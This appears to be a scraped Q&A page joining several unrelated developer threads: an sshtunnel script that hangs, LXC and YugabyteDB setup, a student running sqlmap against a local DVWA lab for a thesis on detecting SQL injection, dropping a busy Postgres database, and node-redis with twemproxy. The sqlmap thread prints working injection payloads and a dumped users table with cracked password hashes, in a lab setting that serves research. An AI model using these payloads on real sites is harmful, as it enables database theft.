I connect to remote database. I'm using sshtunnel for this. I have no problem to connect to DB and get access to data.
My problem is that, my script doesn't exit after everything.
I create connection, download data, print data, stop ssh connection, print 'exit'. This script has cease working at line server.stop() and doesn't print 'stop'. I need to interrupt it to stop working this code.
This is code:
from sshtunnel import SSHTunnelForwarder
from sqlalchemy import create_engine
import pandas as pd
server = SSHTunnelForwarder(
('host', 22),
ssh_password='password',
ssh_username='username',
remote_bind_address=('127.0.0.1', 3306)
)
server.start()
engine = create_engine(
'mysql+mysqldb://db_user:db_pass#127.0.0.1:{}/temps'.format(server.local_bind_port))
query = 'SELECT * FROM temp'
df = pd.read_sql(query, engine)
print(df.head())
print(df.tail())
server.stop()
print('stop')
This script doesn't print 'stop'.
Question: Why this code can not stop working?
EDIT:
I added
trace_logger = create_logger(loglevel="TRACE")
After this I notice something interesting. Code with data transfer hasn't contain one line: Transport is closed. I checked my code without sending sql query and script has correctly finished.
logs with data transfer
2018-10-07 18:41:43,274| WAR | MainThrea/0967#sshtunnel | Could not read SSH configuration file: ~/.ssh/config
2018-10-07 18:41:43,275| INF | MainThrea/0993#sshtunnel | 0 keys loaded from agent
2018-10-07 18:41:43,275| INF | MainThrea/1042#sshtunnel | 0 keys loaded from host directory
2018-10-07 18:41:43,275| INF | MainThrea/0914#sshtunnel | Connecting to gateway: 192.168.0.102:22 as user ‘xxx’
2018-10-07 18:41:43,275| DEB | MainThrea/0917#sshtunnel | Concurrent connections allowed: True
2018-10-07 18:41:43,275| DEB | MainThrea/1369#sshtunnel | Trying to log in with password: xxx
2018-10-07 18:41:43,600| INF | Srv-56620/1389#sshtunnel | Opening tunnel: 0.0.0.0:56620 <> 127.0.0.1:3306
….. # data transfer
2018-10-07 18:41:43,945| INF | MainThrea/1328#sshtunnel | Closing all open connections...
<Logger sshtunnel.SSHTunnelForwarder (TRACE)>
2018-10-07 18:41:43,945| DEB | MainThrea/1332#sshtunnel | Listening tunnels: 0.0.0.0:56620
2018-10-07 18:41:43,945| INF | MainThrea/1408#sshtunnel | Shutting down tunnel ('0.0.0.0', 56620)
2018-10-07 18:41:44,048| INF | Srv-56620/1395#sshtunnel | Tunnel: 0.0.0.0:56620 <> 127.0.0.1:3306 released
logs without data transfer
2018-10-07 18:37:54,016| WAR | MainThrea/0967#sshtunnel | Could not read SSH configuration file: ~/.ssh/config
2018-10-07 18:37:54,017| INF | MainThrea/0993#sshtunnel | 0 keys loaded from agent
2018-10-07 18:37:54,017| INF | MainThrea/1042#sshtunnel | 0 keys loaded from host directory
2018-10-07 18:37:54,017| INF | MainThrea/0914#sshtunnel | Connecting to gateway: 192.168.0.102:22 as user ‘xxx'
2018-10-07 18:37:54,017| DEB | MainThrea/0917#sshtunnel | Concurrent connections allowed: True
2018-10-07 18:37:54,017| DEB | MainThrea/1369#sshtunnel | Trying to log in with password: xxx
2018-10-07 18:37:54,342| INF | Srv-56560/1389#sshtunnel | Opening tunnel: 0.0.0.0:56560 <> 127.0.0.1:3306
2018-10-07 18:37:54,363| INF | MainThrea/1328#sshtunnel | Closing all open connections...
<Logger sshtunnel.SSHTunnelForwarder (TRACE)>
2018-10-07 18:37:54,363| DEB | MainThrea/1332#sshtunnel | Listening tunnels: 0.0.0.0:56560
2018-10-07 18:37:54,363| INF | MainThrea/1408#sshtunnel | Shutting down tunnel ('0.0.0.0', 56560)
2018-10-07 18:37:54,448| INF | Srv-56560/1395#sshtunnel | Tunnel: 0.0.0.0:56560 <> 127.0.0.1:3306 released
2018-10-07 18:37:54,448| DEB | MainThrea/1422#sshtunnel | Transport is closed
After log inspection it turns out that sqlalchemy open connections was the problem.
We created trace_logger = sshtunnel.create_logger(loglevel="TRACE") and passed it to SSHTunnelForwarder
To anyone for future reference:
Adding engine.dispose() after df.read_sql will close all hanging connections to database allowing the ssh tunnel to be closed.
Relevant documentation from sqlalchemy
Just want to add to this in case anyone has the same issue where engine.dispose() doesn't work. I'm on windows python 3.7. Took me hours to find the solution
issuing server.daemon_forward_servers = True before server.start() fixed the problem for me.
More references here:
https://github.com/pahaz/sshtunnel/issues/138
Related
Basically I want to establish website with the LXC. so I installed LXD and created LXC called app1, then installed apache2. All are running, but when I use the LXC IP on the browser it gives "This site can’t be reached", I disabled the ufw even though I removed it but nothing happen.
Here are the commands that I did to test with their results:
$ sudo lxc list
| app1 | RUNNING | 10.221.72.14 (eth0) | fd42:969c:2638:6357:216:3eff:fe59:efd7 (eth0) | CONTAINER | 0
$ sudo lxc network ls
| br0 | bridge | NO | | 0 |
+--------+----------+---------+-------------+---------+
| ens3 | physical | NO | | 0 |
+--------+----------+---------+-------------+---------+
| lxdbr0 | bridge | YES | | 2 |
+--------+----------+---------+-------------+---------+
| virbr0 | bridge | NO | | 0 |
$ sudo lxc network show lxdbr0
config:
ipv4.address: 10.221.72.1/24
ipv4.nat: "true"
ipv6.address: fd42:969c:2638:6357::1/64
ipv6.nat: "true"
description: ""
name: lxdbr0
type: bridge
used_by:
- /1.0/instances/app1
- /1.0/profiles/default
managed: true
status: Created
locations:
- none
[Question posted by a user on YugabyteDB Community Slack]
I'm running the yb-cluster of 3 logical node on 1 VM. I am trying with SSL Mode enabled cluster. Below is the property file i am using to start the cluster with SSL Mode ON:
./bin/yugabyted start --config /data/ybd1/config_1.config
./bin/yugabyted start --base_dir=/data/ybd2 --listen=127.0.0.2 --join=192.168.56.12
./bin/yugabyted start --base_dir=/data/ybd3 --listen=127.0.0.3 --join=192.168.56.12
my config file:
{
"base_dir": "/data/ybd1",
"listen": "192.168.56.12",
"certs_dir": "/root/192.168.56.12/",
"allow_insecure_connections": "false",
"use_node_to_node_encryption": "true"
"use_client_to_server_encryption": "true"
}
I am able to connect using:
bin/ysqlsh -h 127.0.0.3 -U yugabyte -d yugabyte
ysqlsh (11.2-YB-2.11.1.0-b0)
Type "help" for help.
yugabyte=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------------+----------+----------+---------+-------------+-----------------------
postgres | postgres | UTF8 | C | en_US.UTF-8 |
system_platform | postgres | UTF8 | C | en_US.UTF-8 |
template0 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
yugabyte | postgres | UTF8 | C | en_US.UTF-8 |
But when I am trying to connect to my yb-cluster from psql client. I am getting below errors.
psql -h 192.168.56.12 -p 5433
psql: error: connection to server at "192.168.56.12", port 5433 failed: FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
postgres#acff2570dfbc:~$
And in yb t-server logs I am getting below errors:
I0228 05:00:21.248733 21631 async_initializer.cc:90] Successfully built ybclient
2022-02-28 05:02:21.248 UTC [21624] FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
I0228 05:02:21.251086 21627 poller.cc:66] Poll stopped: Service unavailable (yb/rpc/scheduler.cc:80): Scheduler is shutting down (system error 108)
2022-02-28 05:54:20.987 UTC [23729] LOG: invalid length of startup packet
Any HELP in this regard is really apricated.
You’re setting your config wrong when using yugabyted tool. You want to use --master_flags and --tserver_flags like explained in the docs: https://docs.yugabyte.com/latest/reference/configuration/yugabyted/#flags.
An example:
bin/yugabyted start --base_dir=/data/ybd1 --listen=192.168.56.12 --tserver_flags=use_client_to_server_encryption=true,ysql_enable_auth=true,use_cassandra_authentication=true,certs_for_client_dir=/root/192.168.56.12/
Sending the parameters this way should work on your cluster.
I'm writing thesis for my university.
My theme of thesis is "SQL injection detection by using Machine Learning"
To use Machine Learning, first of all, I need thousands of learning data of SQL injection attack.
For that, I proceeded below process.
Install Virtual Box
Install Kali Linux on Virtual Box
Install DVWA(Damn Vulnerable Web Application) on Kali Linux
Attack to DVWA by using sqlmap
On No.4, I succeeded in attacking to DVWA, but I don't know how to get bunch of attacking data.
What I want to get is bunch of actual attacking SQL.
1. launched server.
┌──(root💀kali)-[/home/kali]
└─# service apache2 start
┌──(root💀kali)-[/home/kali]
└─# service mysql start
2. Got cookie and target URL
document.cookie
"security=low; PHPSESSID=cookieinfo"
3 Attack
┌──(root💀kali)-[/usr/bin]
└─# sqlmap -o -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[cookieinfo];security=low" --dump
___
__H__
___ ___[,]_____ ___ ___ {1.4.11#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting # 10:08:01 /2020-12-01/
[10:08:01] [INFO] resuming back-end DBMS 'mysql'
[10:08:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1995 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(1995=1995,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qoRd&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9863 FROM (SELECT(SLEEP(5)))PIFI)-- JYNK&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7162707a71,0x744e45686f7a55414a6744636c497367666d62567679764247415656677779516a76584474645269,0x71626a7871)#&Submit=Submit
---
[10:08:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:08:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:08:01] [INFO] fetching current database
[10:08:01] [INFO] fetching tables for database: 'dvwa'
[10:08:01] [INFO] fetching columns for table 'users' in database 'dvwa'
[10:08:01] [INFO] fetching entries for table 'users' in database 'dvwa'
[10:08:01] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[10:08:07] [INFO] writing hashes to a temporary file '/tmp/sqlmaphbMPEH3181/sqlmaphashes-7QbpSl.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:08:12] [INFO] using hash method 'md5_generic_passwd'
[10:08:12] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[10:08:12] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:08:12] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:08:12] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
Database: dvwa
Table: users
[5 entries]
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar | user | password | last_name | first_name | last_login | failed_login |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | /DVWA-master/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2020-11-29 01:54:52 | 0 |
| 2 | /DVWA-master/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2020-11-29 01:54:52 | 0 |
| 3 | /DVWA-master/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2020-11-29 01:54:52 | 0 |
| 4 | /DVWA-master/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2020-11-29 01:54:52 | 0 |
| 5 | /DVWA-master/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2020-11-29 01:54:52 | 0 |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[10:08:12] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/users.csv'
[10:08:12] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[10:08:12] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+
[10:08:13] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/guestbook.csv'
[10:08:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'
[*] ending # 10:08:13 /2020-12-01/
What I want to get is bunch of actual attacking SQL.
Please anyone help me. Thank you.
This question already has answers here:
PostgreSQL: Drop PostgreSQL database through command line [closed]
(4 answers)
Closed 4 years ago.
Getting the following error when trying to drop a PostgreSQL DB say "test"
postgres=# DROP DATABASE test;
ERROR: database "test" is being accessed by other users
DETAIL: There is 1 other session using the database.
You can use pg_terminate_backend to kill open connections with a query:
PostgresVersion >=9.2
SELECT
pg_terminate_backend(pg_stat_activity.pid)
FROM pg_stat_activity
WHERE
pg_stat_activity.datname = 'test'
AND pid <> pg_backend_pid()
PostgresVersion <9.2
SELECT
pg_terminate_backend(pg_stat_activity.procpid)
FROM
pg_stat_activity
WHERE
pg_stat_activity.datname = 'test'
AND procpid <> pg_backend_pid();
where 'test' is your databasename
1) Run the following command and findout the pid
postgres=# select * from pg_stat_activity where datname='test';
datid | datname | pid | usesysid | usename | current_query | waiting | xact_start | query_start | backend_start | client_addr | client_port
-------+---------+---------+----------+----------+---------------+---------+------------+-------------------------------+-------------------------------+-------------+-------------
28091 | test | 8481 | 10 | postgres | | f | | 2008-11-12 09:12:50.277096+00 | 2008-11-12 09:11:10.328231+00 | 127.0.0.1 | 43152
2) kill -9 8481 (Here the pid is 8481)
3) Now run
postgres=# drop database test;
DROP DATABASE
The Problem
Connecting directly through redis-cli to my twemproxy will correctly proxy me over to redis without any issues/disconnects. However, when I use node-redis to connect to twemproxy I get the following error:
[Error: Redis connection gone from end event.]
Trace is as follows:
Error: Ready check failed: Redis connection gone from end event.
at RedisClient.on_info_cmd (/home/vagrant/tests/write-tests/node_mo
dules/redis/index.js:368:35)
at Command.callback (/home/vagrant/tests/write-tests/node_modules/r
edis/index.js:418:14)
at RedisClient.flush_and_error (/home/vagrant/tests/write-tests/nod
e_modules/redis/index.js:160:29)
at RedisClient.connection_gone (/home/vagrant/tests/write-tests/nod
e_modules/redis/index.js:474:10)
at Socket.<anonymous> (/home/vagrant/tests/write-tests/node_modules
/redis/index.js:103:14)
at Socket.EventEmitter.emit (events.js:117:20)
at _stream_readable.js:919:16
at process._tickCallback (node.js:419:13)
This error occurs whether or not the redis-server is even running, so I am pretty sure it has to do with how node-redis and twemproxy are interacting. Or not interacting, as the case may be.
My Question
Just what the heck is happening?
Background Information
I've got a simple test setup that is as follows:
+------------------+
| +----+----+ |
| | r1 + r2 + |
| +----+----+ |
| | | |
| +---------+ |
| |twemproxy| |
| +---------+ |
| / | \ |
| +----+----+----+ |
| | aw | aw | aw | |
| +----+----+----+ |
+------------------+
aw = api worker
r1/r2 = redis instance
twemproxy = twemproxy
the aw's are currently nodejs clustered on the same host
r1/r2 are instances of node, again on the same host
node version 0.10.x
all three machines are running with very sparse vagrant file. Static IPs assigned to each one for now, private network. Each machine is reachable from every other machine on the specified ports.
After a bit of poking, I realize it is because node_redis attempts to call the "info" command on connection on default.
Simply modifying the connection options to include no_ready_check: true will solve this issue and force the connection through twemproxy.